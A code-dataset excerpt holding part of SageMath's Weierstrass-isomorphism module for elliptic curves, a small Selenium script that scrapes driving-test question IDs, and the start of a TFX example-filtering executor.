isomorphism.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: w = baseWI(); w.is_identity()\n True\n sage: w = baseWI(2,3,4,5); w.is_identity()\n False\n \"\"\"\n return self.tuple() == (1, 0, 0, 0)\n\n def __call__(self, EorP):\n r\"\"\"\n Base application of isomorphisms to curves and points.\n\n A baseWI `w` may be applied to a list `[a1,a2,a3,a4,a6]`\n representing the `a`-invariants of an elliptic curve `E`,\n returning the `a`-invariants of `w(E)`; or to `P=[x,y]` or\n `P=[x,y,z]` representing a point in `\\mathbb{A}^2` or\n `\\mathbb{P}^2`, returning the transformed point.\n\n INPUT:\n\n - ``EorP`` -- either an elliptic curve, or a point on an elliptic curve.\n\n OUTPUT:\n\n The transformed curve or point.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: E = EllipticCurve([0,0,1,-7,6])\n sage: w = baseWI(2,3,4,5)\n sage: w(E.ainvs())\n [4, -7/4, 11/8, -3/2, -9/32]\n sage: P = E(-2,3)\n sage: w(P.xy())\n [-5/4, 9/4]\n sage: EllipticCurve(w(E.ainvs()))(w(P.xy()))\n (-5/4 : 9/4 : 1)\n \"\"\"\n u, r, s, t = self.tuple()\n if len(EorP) == 5:\n a1, a2, a3, a4, a6 = EorP\n a6 += r*(a4 + r*(a2 + r)) - t*(a3 + r*a1 + t)\n a4 += -s*a3 + 2*r*a2 - (t + r*s)*a1 + 3*r*r - 2*s*t\n a3 += r*a1 + t + t\n a2 += -s*a1 + 3*r - s*s\n a1 += 2*s\n return [a1/u, a2/u**2, a3/u**3, a4/u**4, a6/u**6]\n if len(EorP) == 2:\n x, y = EorP\n x -= r\n y -= (s*x+t)\n return [x/u**2, y/u**3]\n if len(EorP) == 3:\n x, y, z = EorP\n x -= r*z\n y -= (s*x+t*z)\n return [x/u**2, y/u**3, z]\n raise ValueError(\"baseWI(a) only for a=(x,y), (x:y:z) or (a1,a2,a3,a4,a6)\")\n\n\ndef isomorphisms(E, F, JustOne=False):\n r\"\"\"\n Return one or all isomorphisms between two elliptic curves.\n\n INPUT:\n\n - ``E``, ``F`` (EllipticCurve) -- Two elliptic curves.\n\n - ``JustOne`` (bool) If ``True``, returns one isomorphism, or ``None`` if\n the curves are not isomorphic. If ``False``, returns a (possibly\n empty) list of isomorphisms.\n\n OUTPUT:\n\n Either ``None``, or a 4-tuple `(u,r,s,t)` representing an isomorphism,\n or a list of these.\n\n .. note::\n\n This function is not intended for users, who should use the\n interface provided by ``ell_generic``.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a3'))\n [(-1, 0, 0, -1), (1, 0, 0, 0)]\n sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a3'),JustOne=True)\n (1, 0, 0, 0)\n sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a1'))\n []\n sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a1'),JustOne=True)\n\n TESTS:\n\n Check that :trac:`32632` is fixed::\n\n sage: z8 = GF(2^8).gen()\n sage: E1 = EllipticCurve([z8, z8, z8, z8, z8])\n sage: isomorphisms(E1, E1)\n [(1, 0, 0, 0), (1, 0, z8, z8)]\n sage: E2 = EllipticCurve([z8^2, 0, 0, 0, z8^7 + z8^4])\n sage: isomorphisms(E1, E2)\n [(z8^7 + z8^3 + z8^2 + z8, 1, 1, z8^7 + z8^3 + z8^2 + z8 + 1),\n (z8^7 + z8^3 + z8^2 + z8, 1, z8 + 1, z8^7 + z8^3 + z8^2 + z8 + 1)]\n \"\"\"\n from .ell_generic import is_EllipticCurve\n if not is_EllipticCurve(E) or not is_EllipticCurve(F):\n raise ValueError(\"arguments are not elliptic curves\")\n K = E.base_ring()\n\n j = E.j_invariant()\n if j != F.j_invariant():\n if JustOne:\n return None\n return []\n\n from sage.rings.polynomial.polynomial_ring import polygen\n x = polygen(K, 'x')\n\n a1E, a2E, a3E, a4E, a6E = E.ainvs()\n a1F, a2F, a3F, a4F, a6F = F.ainvs()\n\n char = K.characteristic()\n\n if char == 2:\n if j == 0:\n ulist = (x**3-(a3E/a3F)).roots(multiplicities=False)\n ans = []\n for u in ulist:\n slist = (x**4+a3E*x+(a2F**2+a4F)*u**4+a2E**2+a4E).roots(multiplicities=False)\n for s in slist:\n r = s**2+a2E+a2F*u**2\n tlist = (x**2 + a3E*x + r**3 + a2E*r**2 + a4E*r + a6E + a6F*u**6).roots(multiplicities=False)\n for t in tlist:\n if JustOne:\n return (u, r, s, t)\n ans.append((u, r, s, t))\n if JustOne:\n return None\n ans.sort()\n return ans\n else:\n ans = []\n u = a1E/a1F\n r = (a3E+a3F*u**3)/a1E\n slist = [s[0] for s in (x**2+a1E*x+(r+a2E+a2F*u**2)).roots()]\n for s in slist:\n t = (a4E+a4F*u**4 + s*a3E + r*s*a1E + r**2) / a1E\n if JustOne:\n return (u, r, s, t)\n ans.append((u, r, s, t))\n if JustOne:\n return None\n ans.sort()\n return ans\n\n b2E, b4E, b6E, b8E = E.b_invariants()\n b2F, b4F, b6F, b8F = F.b_invariants()\n\n if char == 3:\n if j == 0:\n ulist = (x**4-(b4E/b4F)).roots(multiplicities=False)\n ans = []\n for u in ulist:\n s = a1E-a1F*u\n t = a3E-a3F*u**3\n rlist = (x**3-b4E*x+(b6E-b6F*u**6)).roots(multiplicities=False)\n for r in rlist:\n if JustOne:\n return (u, r, s, t+r*a1E)\n ans.append((u, r, s, t+r*a1E))\n if JustOne:\n return None\n ans.sort()\n return ans\n else:\n ulist = (x**2 - b2E / b2F).roots(multiplicities=False)\n ans = []\n for u in ulist:\n r = (b4F * u**4 - b4E) / b2E\n s = (a1E - a1F * u)\n t = (a3E - a3F * u**3 + a1E * r)\n if JustOne:\n return (u, r, s, t)\n ans.append((u, r, s, t))\n if JustOne:\n return None\n ans.sort()\n return ans\n\n# now char!=2,3:\n c4E, c6E = E.c_invariants()\n c4F, c6F = F.c_invariants()\n\n if j == 0:\n m, um = 6, c6E/c6F\n elif j == 1728:\n m, um = 4, c4E/c4F\n else:\n m, um = 2, (c6E*c4F)/(c6F*c4E)\n ulist = (x**m-um).roots(multiplicities=False)\n ans = []\n for u in ulist:\n s = (a1F*u - a1E)/2\n r = (a2F*u**2 + a1E*s + s**2 - a2E)/3\n t = (a3F*u**3 - a1E*r - a3E)/2\n if JustOne:\n return (u, r, s, t)\n ans.append((u, r, s, t))\n if JustOne:\n return None\n ans.sort()\n return ans\n\n\nclass WeierstrassIsomorphism(EllipticCurveHom, baseWI):\n r\"\"\"\n Class representing a Weierstrass isomorphism between two elliptic curves.\n \"\"\"\n def __init__(self, E=None, urst=None, F=None):\n r\"\"\"\n Constructor for WeierstrassIsomorphism class,\n\n INPUT:\n\n - ``E`` -- an EllipticCurve, or None (see below).\n\n - ``urst`` -- a 4-tuple `(u,r,s,t)`, or None (see below).\n\n - ``F`` -- an EllipticCurve, or None (see below).\n\n Given two Elliptic Curves ``E`` and ``F`` (represented by\n Weierstrass models as usual), and a transformation ``urst``\n from ``E`` to ``F``, construct an isomorphism from ``E`` to\n ``F``. An exception is raised if ``urst(E)!=F``. At most one\n of ``E``, ``F``, ``urst`` can be None. If ``F==None`` then\n ``F`` is constructed as ``urst(E)``. If ``E==None`` then\n ``E`` is constructed as ``urst^-1(F)``. If ``urst==None``\n then an isomorphism from ``E`` to ``F`` is constructed if\n possible, and an exception is raised if they are not\n isomorphic. Otherwise ``urst`` can be a tuple of length 4 or\n a object of type ``baseWI``.\n\n Users will not usually need to use this class directly, but instead use\n methods such as ``isomorphism`` of elliptic curves.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: WeierstrassIsomorphism(EllipticCurve([0,1,2,3,4]),(-1,2,3,4))\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + 2*y = x^3 + x^2 + 3*x + 4 over Rational Field\n To: Elliptic Curve defined by y^2 - 6*x*y - 10*y = x^3 - 2*x^2 - 11*x - 2 over Rational Field\n Via: (u,r,s,t) = (-1, 2, 3, 4)\n sage: E = EllipticCurve([0,1,2,3,4])\n sage: F = EllipticCurve(E.cremona_label())\n sage: WeierstrassIsomorphism(E,None,F)\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + 2*y = x^3 + x^2 + 3*x + 4 over Rational Field\n To: Elliptic Curve defined by y^2 = x^3 + x^2 + 3*x + 5 over Rational Field\n Via: (u,r,s,t) = (1, 0, 0, -1)\n sage: w = WeierstrassIsomorphism(None,(1,0,0,-1),F)\n sage: w._domain==E\n True\n\n TESTS:\n\n Check for :trac:`33215`::\n\n sage: E = EllipticCurve(GF(71^2),[5,5])\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n sage: iso = WeierstrassIsomorphism(E, (1,2,3,4))\n sage: ~iso # indirect doctest\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + 6*x*y + 8*y = x^3 + 68*x^2 + 64*x + 7 over Finite Field in z2 of size 71^2\n To: Elliptic Curve defined by y^2 = x^3 + 5*x + 5 over Finite Field in z2 of size 71^2\n Via: (u,r,s,t) = (1, 69, 68, 2)\n \"\"\"\n from .ell_generic import is_EllipticCurve\n\n if E is not None:\n if not is_EllipticCurve(E):\n raise ValueError(\"first argument must be an elliptic curve or None\")\n if F is not None:\n if not is_EllipticCurve(F):\n raise ValueError(\"third argument must be an elliptic curve or None\")\n if urst is not None:\n if len(urst) != 4:\n raise ValueError(\"second argument must be [u,r,s,t] or None\")\n if len([par for par in [E, urst, F] if par is not None]) < 2:\n raise ValueError(\"at most 1 argument can be None\")\n\n inps = []\n if E is not None:\n inps.append(E.base_ring())\n if F is not None:\n inps.append(F.base_ring())\n if urst is not None:\n inps += list(urst)\n base_ring = get_coercion_model().common_parent(*inps)\n\n if urst is not None:\n urst = Sequence(urst, base_ring)\n\n if F is None: # easy case\n baseWI.__init__(self, *urst)\n F = EllipticCurve(baseWI.__call__(self, list(E.a_invariants())))\n\n elif E is None: # easy case in reverse\n baseWI.__init__(self, *urst)\n inv_urst = baseWI.__invert__(self)\n E = EllipticCurve(baseWI.__call__(inv_urst, list(F.a_invariants())))\n\n elif urst is None: # try to construct the morphism\n urst = isomorphisms(E, F, True)\n if urst is None:\n raise ValueError(\"elliptic curves not isomorphic\")\n baseWI.__init__(self, *urst)\n\n else: # none of the parameters is None:\n baseWI.__init__(self, *urst)\n if F != EllipticCurve(baseWI.__call__(self, list(E.a_invariants()))):\n raise ValueError(\"second argument is not an isomorphism from first argument to third argument\")\n\n self._mpoly_ring = PolynomialRing(base_ring, ['x','y'])\n self._poly_ring = PolynomialRing(base_ring, ['x'])\n\n self._domain = E\n self._codomain = F\n EllipticCurveHom.__init__(self, self._domain, self._codomain)\n\n def _richcmp_(self, other, op):\n r\"\"\"\n Standard comparison function for the WeierstrassIsomorphism class.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: E = EllipticCurve('389a1')\n sage: F = E.change_weierstrass_model(1,2,3,4)\n sage: w1 = E.isomorphism_to(F)\n sage: w1 == w1\n True\n sage: w2 = F.automorphisms()[0] *w1\n sage: w1 == w2\n False\n\n sage: E = EllipticCurve_from_j(GF(7)(0))\n sage: F = E.change_weierstrass_model(2,3,4,5)\n sage: a = E.isomorphisms(F)\n sage: b = [w*a[0] for w in F.automorphisms()]\n sage: b.sort()\n sage: a == b\n True\n sage: c = [a[0]*w for w in E.automorphisms()]\n sage: c.sort()\n sage: a == c\n True\n \"\"\"\n if isinstance(other, WeierstrassIsomorphism):\n lx = self._domain\n rx = other._domain\n if lx != rx:\n return richcmp_not_equal(lx, rx, op)\n\n lx = self._codomain\n rx = other._codomain\n if lx != rx:\n return richcmp_not_equal(lx, rx, op)\n\n return baseWI.__richcmp__(self, other, op)\n\n return EllipticCurveHom._richcmp_(self, other, op)\n\n def _eval(self, P):\n r\"\"\"\n Less strict evaluation method for internal use.\n\n In particular, this can be used to evaluate ``self`` at a\n point defined over an extension field.\n\n INPUT: a sequence of 3 coordinates defining a point on ``self``\n\n OUTPUT: the result of evaluating ``self'' at the given point\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n sage: E = EllipticCurve([i,0]); E\n Elliptic Curve defined by y^2 = x^3 + I*x over Number Field in I with defining polynomial x^2 + 1 with I = 1*I\n sage: iso = WeierstrassIsomorphism(E, (i,1,2,3))\n sage: P = E.change_ring(QQbar).lift_x(QQbar.random_element())\n sage: Q = iso._eval(P)\n sage: Q.curve()\n Elliptic Curve defined by y^2 + (-4*I)*x*y + 6*I*y = x^3 + x^2 + (I-9)*x + (-I+8) over Algebraic Field\n sage: y = next(filter(bool, iter(QQbar.random_element, None))) # sample until nonzero\n sage: iso._eval((0, y, 0)) == 0\n True\n \"\"\"\n if self._domain.defining_polynomial()(*P):\n raise ValueError(f'{P} not on {self._domain}')\n\n Q = baseWI.__call__(self, P)\n k = Sequence(tuple(P) + tuple(Q)).universe()\n return self._codomain.base_extend(k).point(Q)\n\n def __call__(self, P):\n r\"\"\"\n Call function for WeierstrassIsomorphism class.\n\n INPUT:\n\n - ``P`` (Point) -- a point on the domain curve.\n\n OUTPUT:\n\n (Point) the transformed point on the codomain curve.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: E = EllipticCurve('37a1')\n sage: w = WeierstrassIsomorphism(E,(2,3,4,5))\n sage: P = E(0,-1)\n sage: w(P)\n (-3/4 : 3/4 : 1)\n sage: w(P).curve() == E.change_weierstrass_model((2,3,4,5))\n True\n \"\"\"\n if P[2] == 0:\n return self._codomain(0)\n return self._codomain.point(baseWI.__call__(self,\n tuple(P._coords)),\n check=False)\n\n def __invert__(self):\n r\"\"\"\n Return the inverse of this WeierstrassIsomorphism.\n\n EXAMPLES::\n\n sage: E = EllipticCurve('5077')\n sage: F = E.change_weierstrass_model([2,3,4,5]); F\n Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field\n sage: w = E.isomorphism_to(F)\n sage: P = E(-2,3,1)\n sage: w(P)\n (-5/4 : 9/4 : 1)\n sage: ~w\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field\n To: Elliptic Curve defined by y^2 + y = x^3 - 7*x + 6 over Rational Field\n Via: (u,r,s,t) = (1/2, -3/4, -2, 7/8)\n sage: Q = w(P); Q\n (-5/4 : 9/4 : 1)\n sage: (~w)(Q)\n (-2 : 3 : 1)\n \"\"\"\n winv = baseWI.__invert__(self).tuple()\n return WeierstrassIsomorphism(self._codomain, winv, self._domain)\n\n @staticmethod\n def _composition_impl(left, right):\n r\"\"\"\n Return the composition of a ``WeierstrassIsomorphism``\n with another elliptic-curve morphism.\n\n Called by :meth:`EllipticCurveHom._composition_`.\n\n EXAMPLES::\n\n sage: E1 = EllipticCurve('5077')\n sage: E2 = E1.change_weierstrass_model([2,3,4,5])\n sage: w1 = E1.isomorphism_to(E2)\n sage: E3 = E2.change_weierstrass_model([6,7,8,9])\n sage: w2 = E2.isomorphism_to(E3)\n sage: P = E1(-2,3,1)\n sage: (w2*w1)(P) == w2(w1(P))\n True\n\n TESTS:\n\n We should return ``NotImplemented`` when passed a combination of\n elliptic-curve morphism types that we don't handle here::\n\n sage: E = EllipticCurve([1,0])\n sage: phi = E.isogeny(E(0,0))\n sage: w1._composition_impl(phi.dual(), phi)\n NotImplemented\n \"\"\"\n if isinstance(left, WeierstrassIsomorphism) and isinstance(right, WeierstrassIsomorphism):\n if left._domain != right._codomain:\n raise ValueError(\"Domain of first argument must equal codomain of second\")\n w = baseWI.__mul__(left, right)\n return WeierstrassIsomorphism(right._domain, w.tuple(), left._codomain)\n\n return NotImplemented\n\n def __repr__(self):\n r\"\"\"\n Return the string representation of this WeierstrassIsomorphism.\n\n OUTPUT:\n\n (string) The underlying morphism, together with an extra line\n showing the `(u,r,s,t)` parameters.\n\n EXAMPLES::\n\n sage: E1 = EllipticCurve('5077')\n sage: E2 = E1.change_weierstrass_model([2,3,4,5])\n sage: E1.isomorphism_to(E2)\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + y = x^3 - 7*x + 6 over Rational Field\n To: Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field\n Via: (u,r,s,t) = (2, 3, 4, 5)\n \"\"\"\n return EllipticCurveHom.__repr__(self) + \"\\n Via: (u,r,s,t) = \" + baseWI.__repr__(self)\n\n # EllipticCurveHom methods\n\n def degree(self):\n \"\"\"\n Return the degree as a rational map of this isomorphism.\n\n Isomorphisms always have degree `1` by definition.\n\n EXAMPLES::\n\n sage: E1 = EllipticCurve([1,2,3,4,5])\n sage: E2 = EllipticCurve_from_j(E1.j_invariant())\n sage: E1.isomorphism_to(E2).degree()\n 1\n\n TESTS:\n\n Test for :trac:`33312`::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n sage: type(WeierstrassIsomorphism.degree(None))\n \n \"\"\"\n return Integer(1)\n\n def rational_maps(self):\n \"\"\"\n Return the pair of rational maps defining this isomorphism.\n\n EXAMPLES::\n\n sage: E1 = EllipticCurve([11,22,33,44,55])\n sage: E2 = EllipticCurve_from_j(E1.j_invariant())\n sage: iso = E1.isomorphism_to(E2); iso\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + 11*x*y + 33*y = x^3 + 22*x^2 + 44*x + 55 over Rational Field\n To: Elliptic Curve defined by y^2 + x*y = x^3 + x^2 - 684*x + 6681 over Rational Field\n Via: (u,r,s,t) = (1, -17, -5, 77)\n sage: iso.rational_maps()\n (x + 17, 5*x + y + 8)\n sage: f = E2.defining_polynomial()(*iso.rational_maps(), 1)\n sage: I = E1.defining_ideal()\n sage: x,y,z = I.ring().gens()\n sage: f in I + Ideal(z-1)\n True\n\n ::\n\n sage: E = EllipticCurve(GF(65537), [1,1,1,1,1])\n sage: w = E.isomorphism_to(E.short_weierstrass_model())\n sage: f,g = w.rational_maps()\n sage: P = E.random_point()\n sage: w(P).xy() == (f(P.xy()), g(P.xy()))\n True\n\n TESTS::\n\n sage: iso.rational_maps()[0].parent()\n Multivariate Polynomial Ring in x, y over Rational Field\n sage: iso.rational_maps()[1].parent()\n Multivariate Polynomial Ring in x, y over Rational Field\n \"\"\"\n return tuple(baseWI.__call__(self, self._mpoly_ring.gens()))\n\n def x_rational_map(self):\n \"\"\"\n Return the `x`-coordinate rational map of this isomorphism.\n\n EXAMPLES::\n\n sage: E1 = EllipticCurve([11,22,33,44,55])\n sage: E2 = EllipticCurve_from_j(E1.j_invariant())\n sage: iso = E1.isomorphism_to(E2); iso\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + 11*x*y + 33*y = x^3 + 22*x^2 + 44*x + 55 over Rational Field\n To: Elliptic Curve defined by y^2 + x*y = x^3 + x^2 - 684*x + 6681 over Rational Field\n Via: (u,r,s,t) = (1, -17, -5, 77)\n sage: iso.x_rational_map()\n x + 17\n sage: iso.x_rational_map() == iso.rational_maps()[0]\n True\n\n TESTS::\n\n sage: iso.x_rational_map().parent()\n Univariate Polynomial Ring in x over Rational Field\n \"\"\"\n x, = self._poly_ring.gens()\n return (x - self.r) / self.u**2\n\n def kernel_polynomial(self):\n \"\"\"\n Return the kernel polynomial of this isomorphism.\n\n Isomorphisms have trivial kernel by definition, hence this\n method always returns `1`.\n\n EXAMPLES::\n\n sage: E1 = EllipticCurve([11,22,33,44,55])\n sage: E2 = EllipticCurve_from_j(E1.j_invariant())\n sage: iso = E1.isomorphism_to(E2)\n sage: iso.kernel_polynomial()\n 1\n sage: psi = E1.isogeny(iso.kernel_polynomial(), codomain=E2); psi\n Isogeny of degree 1 from Elliptic Curve defined by y^2 + 11*x*y + 33*y = x^3 + 22*x^2 + 44*x + 55 over Rational Field to Elliptic Curve defined by y^2 + x*y = x^3 + x^2 - 684*x + 6681 over Rational Field\n sage: psi in {iso, -iso}\n True\n\n TESTS::\n\n sage: iso.kernel_polynomial().parent()\n Univariate Polynomial Ring in x over Rational Field\n \"\"\"\n return self._poly_ring(1)\n\n def dual(self):\n \"\"\"\n Return the dual isogeny of this isomorphism.\n\n For isomorphisms, the dual is just the inverse.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n sage: E = EllipticCurve(QuadraticField(-3), [0,1])\n sage: w = WeierstrassIsomorphism(E, (CyclotomicField(3).gen(),0,0,0))\n sage: (w.dual() * w).rational_maps()\n (x, y)\n\n ::\n\n sage: E1 = EllipticCurve([11,22,33,44,55])\n sage: E2 = E1.short_weierstrass_model()\n sage: iso = E1.isomorphism_to(E2)\n sage: iso.dual() == ~iso\n True\n \"\"\"\n return ~self\n\n def __neg__(self):\n \"\"\"\n Return the negative of this isomorphism, i.e., its composition\n with the negation map `[-1]`.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n sage: E = EllipticCurve([11,22,33,44,55])\n sage: w = WeierstrassIsomorphism(E, (66,77,88,99))\n sage: -w\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + 11*x*y + 33*y = x^3 + 22*x^2 + 44*x + 55 over Rational Field\n To: Elliptic Curve defined by y^2 + 17/6*x*y + 49/13068*y = x^3 - 769/396*x^2 - 3397/862488*x + 44863/7513995456 over Rational Field\n Via: (u,r,s,t) = (-66, 77, -99, -979)\n sage: -(-w) == w\n True\n\n ::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n sage: K. = QuadraticField(-3)\n sage: E = EllipticCurve(K, [0,1])\n sage: w = WeierstrassIsomorphism(E, (CyclotomicField(3).gen(),0,0,0))\n sage: w.tuple()\n (1/2*a - 1/2, 0, 0, 0)\n sage: (-w).tuple()\n (-1/2*a + 1/2, 0, 0, 0)\n sage: (-w)^3 == -(w^3)\n True\n\n ::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n sage: E = EllipticCurve(QuadraticField(-1), [1,0])\n sage: t = WeierstrassIsomorphism(E, (i,0,0,0))\n sage: -t^2 == WeierstrassIsomorphism(E, (1,0,0,0))\n True\n \"\"\"\n a1,_,a3,_,_ = self._domain.a_invariants()\n w = baseWI(-1, 0, -a1, -a3)\n urst = baseWI.__mul__(self, w).tuple()\n return WeierstrassIsomorphism(self._domain, urst, self._codomain)\n\n","repo_name":"mkoeppe/sage-archive-2023-02-06","sub_path":"src/sage/schemes/elliptic_curves/weierstrass_morphism.py","file_name":"weierstrass_morphism.py","file_ext":"py","file_size_in_byte":31373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29779379891","text":"import selenium.webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport json\r\n\r\nif __name__ == '__main__':\r\n dict_question = {}\r\n url = \"https://www.jiakaobaodian.com/mnks/exercise/0-car-kemu1-beijing.html?id=800500\"\r\n google = selenium.webdriver.Chrome(r'D:\\软件\\google\\ChromeCore\\chromedriver.exe')\r\n google.get(url)\r\n html = google.page_source\r\n google.quit()\r\n # print(html)\r\n soup = BeautifulSoup(html, \"html.parser\")\r\n ul = soup.find('ul', class_=\"list-w clearfix hide\")\r\n li_all = ul.find_all(\"li\")\r\n '''\r\n 数据库更新了之后只需要将对应更新的题数加上即可-----------------------------------------------**************************************\r\n '''\r\n li_all = li_all[0:2204]\r\n for li in li_all:\r\n i = li.find('a')\r\n dict_question[f'{i.get(\"data-id\")}'] = f\"{eval(i.get('data-index')) + 1}\"\r\n dict_json = json.dumps(dict_question, sort_keys=False, indent=4, separators=(',', ':'))\r\n with open(\"./question.json\",'w') as f:\r\n f.write(dict_json)\r\n","repo_name":"tangsangsimida/python_sipider_-","sub_path":"1_2000+的题目对应的编号写入字典.py","file_name":"1_2000+的题目对应的编号写入字典.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27485606133","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\nimport os\nfrom typing import Any, Dict, Mapping, List, Text\n\nimport apache_beam as beam\nimport tensorflow as tf\nfrom absl import logging\nfrom tfx import types\nfrom tfx.dsl.components.base import base_beam_executor\nfrom tfx.types import artifact_utils, Artifact\nfrom tfx.utils import io_utils, json_utils\n\nfrom tfx_x.components import utils\n\nFILTERED_EXAMPLES_KEY = 'filtered_examples'\nEXAMPLES_KEY = 'examples'\nPREDICATE_FN_KEY = 'predicate_fn'\nSPLITS_TO_COPY_KEY = 'splits_to_copy'\nSPLITS_TO_TRANSFORM_KEY = 'splits_to_transform'\nPIPELINE_CONFIGURATION_KEY = 'pipeline_configuration'\nPREDICATE_FN_KEY_KEY = 'predicate_fn_key'\n\n_FILTERED_EXAMPLES_FILE_PREFIX = 'filtered_examples'\n_FILTERED_EXAMPLES_DIR_NAME = 'filtered_examples'\n\n\nclass Executor(base_beam_executor.BaseBeamExecutor):\n \"\"\"TFX stratified sampler executor.\"\"\"\n\n def Do(self, input_dict: Dict[Text, List[types.Artifact]],\n output_dict: Dict[Text, List[types.Artifact]],\n exec_properties: Dict[Text, Any]) -> None:\n \"\"\"Runs stratified sampling on given input examples.\n Args:\n input_dict: Input dict from input key to a list of Artifacts.\n - examples: examples for inference.\n - pipeline_configuration: optional PipelineConfiguration artifact.\n output_dict: Output dict from output key to a list of Artifacts.\n - filtered_examples: the stratified examples.\n exec_properties: A dict of execution properties.\n - splits_to_transform: list of splits to transform.\n - splits_to_copy: list of splits to copy as is.\n - predicate_fn: the function defines if a sample must be kept - must be 'predicate: Example -> bool\n - predicate_fn_key: alternate name for the key containing the def of `predicate()`\n Returns:\n None\n \"\"\"\n self._log_startup(input_dict, output_dict, exec_properties)\n\n examples = input_dict[EXAMPLES_KEY]\n\n # Priority is as follow:\n # 1. default value\n # 2. from PipelineConfiguration\n # 3. from exec_properties\n\n splits_to_transform = []\n predicate_fn = None\n\n predicate_fn_key = exec_properties[\n PREDICATE_FN_KEY_KEY] if PREDICATE_FN_KEY_KEY in exec_properties else PREDICATE_FN_KEY\n\n splits_to_copy = artifact_utils.decode_split_names(\n artifact_utils.get_single_instance(examples).split_names)\n\n if PIPELINE_CONFIGURATION_KEY in input_dict:\n pipeline_configuration_dir = artifact_utils.get_single_uri(input_dict[PIPELINE_CONFIGURATION_KEY])\n pipeline_configuration_file = os.path.join(pipeline_configuration_dir, 'custom_config.json')\n pipeline_configuration_str = io_utils.read_string_file(pipeline_configuration_file)\n pipeline_configuration = json.loads(pipeline_configuration_str)\n\n if SPLITS_TO_TRANSFORM_KEY in pipeline_configuration:\n splits_to_transform = pipeline_configuration[SPLITS_TO_TRANSFORM_KEY]\n else:\n splits_to_transform = []\n\n if SPLITS_TO_COPY_KEY in pipeline_configuration:\n splits_to_copy = pipeline_configuration[SPLITS_TO_COPY_KEY]\n\n if predicate_fn_key in pipeline_configuration:\n predicate_fn = pipeline_configuration[predicate_fn_key]\n\n # Now looking at the exec_properties\n if SPLITS_TO_TRANSFORM_KEY in exec_properties and exec_properties[SPLITS_TO_TRANSFORM_KEY] is not None:\n splits_to_transform = json_utils.loads(exec_properties[SPLITS_TO_TRANSFORM_KEY])\n\n if SPLITS_TO_COPY_KEY in exec_properties and exec_properties[SPLITS_TO_COPY_KEY] is not None:\n splits_to_copy = json_utils.loads(exec_properties[SPLITS_TO_COPY_KEY])\n\n if PREDICATE_FN_KEY in exec_properties and exec_properties[PREDICATE_FN_KEY] is not None:\n predicate_fn = exec_properties[PREDICATE_FN_KEY]\n\n if predicate_fn_key in exec_properties and exec_properties[predicate_fn_key] is not None:\n predicate_fn = exec_properties[predicate_fn_key]\n\n # Validate we have all we need\n if predicate_fn is None:\n raise ValueError('\\'predicate_fn\\' is missing in exec dict.')\n\n if EXAMPLES_KEY not in input_dict:\n raise ValueError('\\'examples\\' is missing in input dict.')\n\n if FILTERED_EXAMPLES_KEY not in output_dict:\n raise ValueError('\\'filtered_examples\\' is missing in output dict.')\n\n output_artifact = artifact_utils.get_single_instance(output_dict[FILTERED_EXAMPLES_KEY])\n output_artifact.split_names = artifact_utils.encode_split_names(splits_to_transform + splits_to_copy)\n\n example_uris = {}\n\n for split in splits_to_transform:\n data_uri = artifact_utils.get_split_uri(examples, split)\n example_uris[split] = data_uri\n\n # do something with the splits we dont want to transform ('splits_to_copy')\n utils.copy_over(examples, output_artifact, splits_to_copy)\n\n self._run_filtering(example_uris,\n output_artifact=output_artifact,\n predicate_fn=predicate_fn)\n\n logging.info('Filter generates filtered examples to %s', output_artifact.uri)\n\n def _run_filtering(self,\n example_uris: Mapping[Text, Text],\n predicate_fn: Text,\n output_artifact: Artifact) -> None:\n \"\"\"Runs stratified sampling on given example data.\n Args:\n example_uris: Mapping of example split name to example uri.\n predicate_fn: function to decide if a example must be kept.\n output_artifact: Output artifact.\n Returns:\n None\n \"\"\"\n\n d = {}\n exec(predicate_fn, globals(), d) # how ugly is that?\n predicate = d['predicate']\n\n with self._make_beam_pipeline() as pipeline:\n for split_name, example_uri in example_uris.items():\n data_list = [(\n pipeline | 'ReadData[{}]'.format(split_name) >> beam.io.ReadFromTFRecord(\n 